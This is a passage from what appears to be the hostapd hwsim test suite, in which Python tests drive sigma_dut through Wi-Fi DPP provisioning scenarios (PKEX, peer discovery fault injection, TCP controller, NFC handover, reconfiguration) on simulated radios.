("MissingAttribute", "PKEXExchangeResponse", "DPPStatus",
"BootstrapResult,Errorsent",
"No DPP Status attribute"),
("MissingAttribute", "PKEXCRResponse", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found")]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail):
t = threading.Thread(target=dpp_proto_init_pkex, args=(dev[1],))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"),
conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
def run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, args):
sigma = start_sigma_dut(dev[0].ifname)
try:
init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev)
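        # Authentication and configuration are expected to succeed; the error
        # is injected into the Peer Discovery Request, so only the network
        # introduction step ends in Errorsent.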
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes,DPPFrameType,PeerDiscoveryRequest," + args, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,Errorsent" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0", allow_fail=True)
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request"""
run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, "DPPStep,MissingAttribute,DPPIEAttribute,TransactionID")
def test_sigma_dut_dpp_proto_peer_disc_req2(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request (2)"""
check_dpp_capab(dev[0], min_ver=3)
run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, "DPPStep,MissingAttribute,DPPIEAttribute,ProtocolVersion")
def test_sigma_dut_dpp_proto_peer_disc_req3(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request (e)"""
check_dpp_capab(dev[0], min_ver=3)
run_sigma_dut_dpp_proto_peer_disc_req(dev, apdev, "DPPStep,InvalidValue,DPPIEAttribute,ProtocolVersion")
def test_sigma_dut_dpp_self_config(dev, apdev):
"""sigma_dut DPP Configurator enrolling an AP and using self-configuration"""
check_dpp_capab(dev[0])
hapd = hostapd.add_ap(apdev[0], {"ssid": "unconfigured"})
check_dpp_capab(hapd)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
id = hapd.dpp_bootstrap_gen(chan="81/1", mac=True)
uri = hapd.request("DPP_BOOTSTRAP_GET_URI %d" % id)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
update_hapd_config(hapd)
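        # The AP is now provisioned; next, sigma_dut self-configures as a STA
        # Configurator and verifies that it can connect to that AP.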
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPCryptoIdentifier,P-256,DPPBS,QR,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPAuthDirection,Single,DPPConfIndex,1,DPPTimeout,6,DPPWaitForConnect,Yes,DPPSelfConfigure,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0")
def test_sigma_dut_ap_dpp_self_config(dev, apdev, params):
"""sigma_dut DPP AP Configurator using self-configuration"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_self_config.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_self_config(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0", allow_fail=True)
def run_sigma_dut_ap_dpp_self_config(dev, apdev):
check_dpp_capab(dev[0])
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPConfIndex,1,DPPSelfConfigure,Yes,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].set("dpp_config_processing", "2")
id = dev[0].dpp_bootstrap_gen(chan="81/11", mac=True)
uri = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id)
cmd = "DPP_LISTEN 2462 role=enrollee"
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].wait_connected(timeout=20)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_ap_dpp_relay(dev, apdev, params):
"""sigma_dut DPP AP as Relay to Controller"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_relay.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_relay(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def run_sigma_dut_ap_dpp_relay(dev, apdev):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
" conf=sta-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
res = dev[1].request("DPP_BOOTSTRAP_INFO %d" % id_c)
pkhash = None
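    # Extract the Controller's bootstrapping key hash; the Relay AP is pointed
    # at the Controller with this hash via ap_preset_testparameters below.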
for line in res.splitlines():
name, value = line.split('=')
if name == "pkhash":
pkhash = value
break
if not pkhash:
raise Exception("Could not fetch public key hash from Controller")
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
sigma_dut_cmd_check("ap_reset_default,program,DPP")
sigma_dut_cmd_check("ap_preset_testparameters,program,DPP,DPPConfiguratorAddress,127.0.0.1,DPPConfiguratorPKHash," + pkhash)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
dev[0].dpp_auth_init(uri=uri_c, role="enrollee")
wait_auth_success(dev[1], dev[0], configurator=dev[1], enrollee=dev[0])
sigma_dut_cmd_check("ap_reset_default")
def dpp_init_tcp_enrollee(dev, id1):
logger.info("Starting DPP initiator/enrollee (TCP) in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=enrollee tcp_addr=127.0.0.1" % id1
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_tcp_conf_resp(dev, apdev):
"""sigma_dut DPP TCP Configurator (Controller) as responder"""
run_sigma_dut_dpp_tcp_conf_resp(dev)
def run_sigma_dut_dpp_tcp_conf_resp(dev, status_query=False):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_tcp_enrollee, args=(dev[1], id1))
t.start()
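        # sigma_dut acts as the Configurator behind a TCP Controller
        # (DPPOverTCP,yes) while the peer thread initiates as a TCP Enrollee
        # toward 127.0.0.1.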
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPConfIndex,1,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPBS,QR,DPPOverTCP,yes,DPPTimeout,6"
if status_query:
cmd += ",DPPStatusQuery,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if status_query and "StatusResult,0" not in res:
raise Exception("Status query did not succeed: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_tcp_configurator(dev, id1, conf_id):
logger.info("Starting DPP initiator/configurator (TCP) in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=configurator conf=sta-dpp configurator=%d tcp_addr=127.0.0.1" % (id1, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_dpp_tcp_enrollee_resp(dev, apdev):
"""sigma_dut DPP TCP Enrollee (Controller) as responder"""
run_sigma_dut_dpp_tcp_enrollee_resp(dev)
def run_sigma_dut_dpp_tcp_enrollee_resp(dev, status_query=False):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id1 = dev[1].dpp_qr_code(uri)
t = threading.Thread(target=dpp_init_tcp_configurator, args=(dev[1], id1, conf_id))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPSigningKeyECC,P-256,DPPBS,QR,DPPOverTCP,yes,DPPTimeout,6"
if status_query:
cmd += ",DPPStatusQuery,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
if status_query and "StatusResult,0" not in res:
raise Exception("Status query did not succeed: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_tcp_enrollee_init(dev, apdev):
"""sigma_dut DPP TCP Enrollee as initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
" conf=sta-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def test_sigma_dut_ap_dpp_tcp_enrollee_init(dev, apdev, params):
"""sigma_dut DPP AP as TCP Enrollee/initiator"""
logdir = params['prefix'] + ".sigma-hostapd"
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_tcp_enrollee_init(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def run_sigma_dut_ap_dpp_tcp_enrollee_init(dev, apdev):
check_dpp_capab(dev[1])
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
"conf=ap-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
sigma_dut_cmd_check("ap_reset_default,program,DPP")
sigma_dut_cmd_check("ap_preset_testparameters,Program,DPP,NAME,AP,oper_chn,6")
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_dpp_tcp_enrollee_init_mutual(dev, apdev):
"""sigma_dut DPP TCP Enrollee as initiator with mutual authentication"""
check_dpp_capab(dev[0], min_ver=2)
check_dpp_capab(dev[1], min_ver=2)
sigma = start_sigma_dut(dev[0].ifname)
try:
# Controller
conf_id = dev[1].dpp_configurator_add()
dev[1].set("dpp_configurator_params",
"conf=sta-dpp configurator=%d" % conf_id)
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START"):
raise Exception("Failed to start Controller")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def test_sigma_dut_dpp_tcp_configurator_init_mutual(dev, apdev):
"""sigma_dut DPP TCP Configurator as initiator with mutual authentication"""
check_dpp_capab(dev[0], min_ver=2)
check_dpp_capab(dev[1], min_ver=2)
sigma = start_sigma_dut(dev[0].ifname)
try:
id_c = dev[1].dpp_bootstrap_gen()
uri_c = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_c)
if "OK" not in dev[1].request("DPP_CONTROLLER_START role=enrollee"):
raise Exception("Failed to start Controller")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri_c))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd_check(cmd)
hex = res.split(',')[3]
uri = from_hex(hex)
logger.info("URI from sigma_dut: " + uri)
id1 = dev[1].dpp_qr_code(uri)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPOverTCP,127.0.0.1,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[1].request("DPP_CONTROLLER_STOP")
def test_sigma_dut_dpp_nfc_handover_requestor_enrollee(dev, apdev):
"""sigma_dut DPP/NFC handover requestor as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
id_own = dev[1].dpp_bootstrap_gen(type="nfc-uri", chan="81/1,6,11",
mac=True)
uri_own = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPBS,NFC")
hex = res.split(',')[3]
uri_peer = from_hex(hex)
logger.info("URI from sigma_dut: " + uri_peer)
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,NFC" % to_hex(uri_own))
res = dev[1].request("DPP_NFC_HANDOVER_REQ own=%d uri=%s" % (id_own,
uri_peer))
if "FAIL" in res:
raise Exception("Failed to process NFC Handover Request")
info = dev[1].request("DPP_BOOTSTRAP_INFO %d" % id_own)
logger.info("Updated local bootstrapping info:\n" + info)
freq = None
for line in info.splitlines():
if line.startswith("use_freq="):
freq = int(line.split('=')[1])
if freq is None:
raise Exception("Selected channel not indicated")
uri1 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
logger.info("Updated URI[1]: " + uri1)
dev[1].dpp_listen(freq, role="configurator")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Negotiated_Requestor,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
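# Note on the NFC negotiated handover flow used above: sigma_dut generates its
# own NFC bootstrapping URI (GetLocalBootstrap,DPPBS,NFC) and dev[1] processes
# that URI as an NFC Handover Request (DPP_NFC_HANDOVER_REQ), narrowing its
# channel list to one supported by both sides; the resulting use_freq from
# DPP_BOOTSTRAP_INFO is where dev[1] then listens as Configurator. In the
# selector variant below the roles are swapped: dev[1] uses
# DPP_NFC_HANDOVER_SEL and initiates the authentication itself.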
def test_sigma_dut_dpp_nfc_handover_selector_enrollee(dev, apdev):
"""sigma_dut DPP/NFC handover selector as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
id_own = dev[1].dpp_bootstrap_gen(type="nfc-uri", chan="81/1,6,11",
mac=True)
uri_own = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPBS,NFC")
hex = res.split(',')[3]
uri_peer = from_hex(hex)
logger.info("URI from sigma_dut: " + uri_peer)
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,NFC" % to_hex(uri_own))
res = dev[1].request("DPP_NFC_HANDOVER_SEL own=%d uri=%s" % (id_own,
uri_peer))
if "FAIL" in res:
raise Exception("Failed to process NFC Handover Select")
peer = int(res)
dev[1].dpp_auth_init(peer=peer, own=id_own, configurator=conf_id,
conf="sta-dpp", ssid="DPPNET01")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Negotiated_Selector,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_nfc_static_read_enrollee(dev, apdev):
"""sigma_dut DPP/NFC read tag as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
id_own = dev[1].dpp_bootstrap_gen(type="nfc-uri", chan="81/6", mac=True)
uri_own = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id_own)
sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,NFC" % to_hex(uri_own))
dev[1].dpp_listen(2437, role="configurator")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Static,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_nfc_static_write_enrollee(dev, apdev):
"""sigma_dut DPP/NFC write tag as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
res = sigma_dut_cmd_check("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPBS,NFC")
hex = res.split(',')[3]
uri_peer = from_hex(hex)
logger.info("URI from sigma_dut: " + uri_peer)
dev[1].dpp_auth_init(nfc_uri=uri_peer, configurator=conf_id,
conf="sta-dpp", ssid="DPPNET01")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPProvisioningRole,Enrollee,DPPBS,NFC,DPPNFCHandover,Static,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_reconfig_enrollee(dev, apdev):
"""sigma_dut DPP reconfiguration (Enrollee)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
hapd = start_dpp_ap(apdev[0])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
ifname = dev[0].ifname
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
hapd.disable()
dev[0].dump_monitor()
ssid = "reconfig"
passphrase = "secret passphrase"
params = hostapd.wpa2_params(ssid=ssid, passphrase=passphrase)
hapd = hostapd.add_ap(apdev[0], params)
dev[1].set("dpp_configurator_params",
"conf=sta-psk ssid=%s pass=%s conn_status=1" % (binascii.hexlify(ssid.encode()).decode(), binascii.hexlify(passphrase.encode()).decode()))
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
dev[1].dump_monitor()
